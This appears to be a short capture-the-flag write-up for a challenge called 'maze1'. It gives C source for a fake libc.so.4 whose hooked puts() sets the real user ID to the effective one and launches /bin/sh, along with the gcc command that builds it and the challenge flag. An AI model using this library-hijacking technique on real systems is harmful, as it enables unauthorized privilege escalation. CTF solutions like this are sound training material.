← Back
maze1 | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

in this challange, we need to create our own libc.so.4 that will be used by the program.

#include <stdio.h>
#include<unistd.h>

// Hooked puts function
int puts(const char *str) {

    setreuid(geteuid(), geteuid());

    char path[256] = "/bin/sh";
    char* argv[2];
    argv[0] = path;
    argv[1] = NULL;
    execv(path,argv);

    return 0;
}

, you need to adjust the addresses on the stack of the (maybe) local variables.

the commands for compiling and linking the so file, here.

gcc -m32 -shared -fPIC -o libc.so.4 hook.c -ldl

notice the tmp dir you’re working on can’t be something that mktemp has made, it won’t work properly.

image

Flag: PBeZRPjetr